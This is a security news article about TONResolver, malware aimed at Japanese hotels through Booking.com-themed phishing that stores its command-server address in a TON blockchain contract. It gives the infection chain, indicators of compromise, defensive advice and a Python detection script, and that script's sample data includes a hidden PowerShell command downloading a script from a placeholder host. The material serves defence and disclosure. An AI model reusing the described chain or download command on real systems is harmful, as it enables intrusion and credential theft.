TONResolver Malware Uses TON Blockchain to Switch C2 Servers in Japan Hotel Phishing Campaign


A new malware campaign is targeting Japanese accommodation businesses with phishing emails that impersonate Booking.com-related guest complaints and review requests.

The malware, tracked as TONResolver, uses The Open Network blockchain to hide and update its command-and-control server address. According to Trend Micro’s report, attackers began sending the phishing emails in late May 2026 to Japanese partner companies that use Booking.com.

The main risk is not only the first infection. Once TONResolver runs on a victim’s system, it can keep a live connection with attacker infrastructure, send endpoint information, and wait for additional commands.

TONResolver turns blockchain into a C2 lookup system

TONResolver stands out because it does not store a fixed command-and-control domain inside the malware. Instead, it queries a TON smart contract through the TON API service and retrieves the current attacker-controlled server address from the blockchain.

This technique is known as a dead drop resolver. In simple terms, the malware checks an outside location for instructions on where to connect next. If defenders block one server, the attacker can update the smart contract and redirect infected machines to a new server.

The technique fits the broader MITRE ATT&CK Dynamic Resolution category, where attackers dynamically change command-and-control connection details to avoid detection and takedown.

How the phishing campaign works

The campaign starts with emails written to look like urgent hotel business messages. Some emails claim that a guest submitted a serious complaint. Others ask staff to review stay-related photos, videos, or attached evidence.

Trend Micro observed two main delivery methods. One used bulk phishing emails with Japanese-language subjects such as “Important: Guest Stay Review Request.” The other used a conversational approach through Gmail, where the attacker first sent a normal inquiry and delivered the malicious link only after the hotel replied.

This trust-building step makes the campaign harder for staff to spot. A hotel employee may expect follow-up messages from guests, especially when the topic involves complaints, reservations, or room availability.

Stage | What happens | Why it matters
Phishing email | Attackers send Booking.com-themed complaint or inquiry messages | Hotel staff are pushed to click a link quickly
ZIP download | The link downloads an archive from attacker infrastructure | The malware arrives disguised as business-related material
LNK execution | A shortcut file disguised as a photo launches PowerShell | User execution starts the infection chain
PowerShell script | The script downloads and prepares the payload | The attack uses native Windows scripting to move forward
Node.js runtime | Node.js is downloaded and placed under the user profile | A legitimate runtime executes the malicious JavaScript file
TONResolver | The malware queries TON and connects to the retrieved C2 server | Attackers can switch infrastructure without changing the payload

Node.js helps the malware blend in

The payload is a JavaScript file executed with Node.js. In observed samples, the malware retrieved Node.js version 24.13.0 from the official Node.js distribution path if node.exe was not already present.

The runtime and payload were placed under the user’s AppData folder. This helped the malware run without installing a traditional executable in a more obvious location.

TONResolver also uses VM-based obfuscation. Its logic is converted into a custom virtual instruction set, which makes static analysis harder and slows down detection engineering.

What TONResolver does after infection

After execution, TONResolver checks whether another copy is already running, sets persistence through the Windows registry Run key, then performs a connectivity check.

It then calls the TON smart contract through the TON API REST service using a method named get_domain. The returned value gives the malware the active command-and-control server.

Email sample generated by organizing information from reported emails (Source – Trend Micro)

After connecting, the malware uses encrypted WebSocket communication. Trend Micro reported the use of ECDH, HKDF-SHA256, and AES-256-CBC for its command-and-control traffic, making simple network string inspection less effective.

  • Checks for duplicate execution through a mutex-style mechanism
  • Sets persistence through HKCU registry Run keys
  • Queries tonapi[.]io for the active C2 domain
  • Sends endpoint data such as username, hostname, OS, CPU, memory, and MAC address
  • Maintains a keepalive loop with the attacker-controlled server
  • Supports follow-on command execution and payload delivery

Credential theft followed some infections

Trend Micro said the malware does not immediately steal files or credentials at the first stage. Instead, it appears to give attackers a foothold that can support later command execution.

Observed follow-on activity included attempts to steal credentials and browser data. The targets included Chrome and Edge passwords, cookies, history, and autofill content.

This matters for hotels because one infected front-desk or back-office machine can expose booking portals, email accounts, payment-related workflows, and partner systems. Credential theft can also let attackers return later through legitimate accounts.

Why the TON smart contract method is difficult to disrupt

Blocking one C2 domain may not end the infection. The attacker can write a new domain into the TON smart contract, and infected systems can retrieve the new destination during the next lookup.

That is why the campaign aligns with the dynamic resolution technique. The malware separates the payload from its current infrastructure, giving attackers more room to recover when defenders block domains.

Trend Micro’s blockchain analysis found multiple C2 domain changes written to the TON contract, including entries from February 2026 and June 2026. This shows the resolver mechanism was not only theoretical, but actively used.

Indicator type | Indicator | Description
Detection name | TrojanSpy.JS.TONRESOLVER.A | Trend Micro detection for the JavaScript RAT payload
TON API domain | tonapi[.]io | Legitimate TON API service abused for C2 resolution
TON method | methods/get_domain | Smart contract method used to retrieve the active C2 domain
Resolver contract | 0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9 | TON contract used to store the C2 domain
Updater contract | 0:6d5b44d0678e6bd6703f2cabd2531ccf5a0b11cc081f8f7175bd679db4c12d41 | Attacker-controlled TON contract tied to C2 updates
Payload path | %USERPROFILE%\AppData\Local\Nodejs\(unknown).js | Location where the JavaScript payload is saved
Node.js path | %USERPROFILE%\AppData\Local\Nodejs\node-v24.13.0-win-x64\ | Directory used for the Node.js runtime
Persistence key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Registry location used to restart the malware

Defenders should watch PowerShell, Node.js, and TON traffic

Hotels and managed IT providers supporting accommodation businesses should review endpoint telemetry for PowerShell downloading scripts from suspicious domains. They should also check for Node.js running from AppData paths rather than approved development folders.

The Trend Micro recommendations include restricting connectivity to TON services where they are not needed for business operations. Blocking tonapi[.]io can interrupt the resolver stage of this attack chain.

Files contained in the zip archive (Source – Trend Micro)

Security teams should also train hotel staff to treat complaint-themed emails with caution. Messages that ask staff to download photos, videos, or evidence through external links deserve extra review, even when they appear to concern a real reservation issue.

  • Block or monitor access to tonapi[.]io where blockchain access is not required
  • Restrict PowerShell from retrieving files from the internet
  • Alert on node.exe running from AppData or temporary user folders
  • Inspect LNK files delivered inside ZIP archives
  • Review registry Run keys for suspicious JavaScript or Node.js execution
  • Reset passwords and browser sessions on systems that show signs of compromise
  • Monitor hotel booking, email, and payment-related accounts for suspicious logins
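As an added example (not the article's or Trend Micro's code), the following Python pass applies the detection points in the list above, plus the get_domain resolver lookup described earlier, to a few constructed telemetry events; the event field names, the sample paths and command lines, and the tonapi.io URL shape are assumptions.

```python
import re

# Constructed sample telemetry shaped after the article's chain; not real logs.
# The resolver contract address is the one listed in the indicator table above.
RESOLVER = "0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9"
SAMPLE_EVENTS = [
    {"kind": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr https://cdn.example.invalid/p.ps1 -OutFile p.ps1"'},
    {"kind": "process", "image": r"C:\Users\desk\AppData\Local\Nodejs\node-v24.13.0-win-x64\node.exe",
     "cmdline": r"node.exe C:\Users\desk\AppData\Local\Nodejs\payload.js"},
    {"kind": "http", "host": "tonapi.io", "url": f"/v2/blockchain/accounts/{RESOLVER}/methods/get_domain"},
    {"kind": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": r"C:\Users\desk\AppData\Local\Nodejs\node-v24.13.0-win-x64\node.exe C:\Users\desk\AppData\Local\Nodejs\payload.js"},
    # Benign: Node.js running from an installed location doing developer work.
    {"kind": "process", "image": r"C:\Program Files\nodejs\node.exe", "cmdline": "node.exe build.js"},
]

DOWNLOAD_CMDLETS = re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b")
USER_APPDATA = re.compile(r"(?i)\\AppData\\(Local|Roaming)\\")

def classify(event):
    """Return the names of the detection rules this event matches (empty if none)."""
    hits = []
    if event["kind"] == "process":
        exe = event["image"].rsplit("\\", 1)[-1].lower()
        if exe == "powershell.exe" and DOWNLOAD_CMDLETS.search(event["cmdline"]):
            hits.append("powershell_internet_download")      # PowerShell fetching a stager
        if exe == "node.exe" and USER_APPDATA.search(event["image"]):
            hits.append("node_from_appdata")                  # runtime dropped under the user profile
    elif event["kind"] == "http":
        if event["host"].lower().endswith("tonapi.io"):
            hits.append("ton_api_contact")                    # any TON API use from this host
            if "/methods/get_domain" in event["url"]:
                hits.append("ton_get_domain_resolver_lookup") # the dead drop resolver call
    elif event["kind"] == "registry":
        if event["key"].lower().endswith(r"\currentversion\run") and re.search(r"(?i)node\.exe|\.js\b", event["value"]):
            hits.append("run_key_nodejs_persistence")         # Run key pointing at node.exe / a .js file
    return hits

def scan(events):
    """Map each triggered rule to the indexes of the events that fired it."""
    findings = {}
    for i, ev in enumerate(events):
        for rule in classify(ev):
            findings.setdefault(rule, []).append(i)
    return findings

if __name__ == "__main__":
    for rule, idx in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: event(s) {idx}")
```

The benign last event produces no findings, which is the point of keying the Node.js rule on the AppData path rather than on node.exe alone.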

Japan’s hotel sector remains the primary target

The campaign currently centers on Japanese accommodation facilities, but the technique can spread to other regions and industries. Any organization that relies heavily on email-based customer communication could face similar lures.

TONResolver also shows how attackers can combine familiar phishing, legitimate runtimes, blockchain infrastructure, and encrypted communication into one infection chain. Each layer makes the activity harder to stop with a single control.

The practical response is clear. Organizations should reduce unnecessary blockchain access, harden script execution, monitor unusual Node.js behavior, and investigate any endpoint that recently opened suspicious guest complaint archives.

FAQ

What is TONResolver malware?

TONResolver is a JavaScript-based remote access trojan that runs through Node.js. It uses a TON smart contract to retrieve its current command-and-control server address.

Who is TONResolver targeting?

Trend Micro reported that the observed campaign targeted Japanese accommodation facilities that use Booking.com, mainly through phishing emails disguised as guest complaints, review requests, or hotel inquiries.

How does TONResolver use the TON blockchain?

TONResolver queries a TON smart contract through tonapi.io and retrieves the active C2 domain from a method called get_domain. This lets attackers change the server address without changing the malware file.

Why does TONResolver use Node.js?

The malware uses Node.js to execute its JavaScript payload. In observed attacks, the runtime was downloaded and stored under the user profile, which helped the payload run through a legitimate platform.

How can organizations defend against TONResolver?

Organizations should restrict unnecessary access to TON services, block PowerShell from downloading external files where possible, monitor node.exe running from AppData, inspect LNK files in ZIP archives, and review registry Run keys for suspicious persistence.
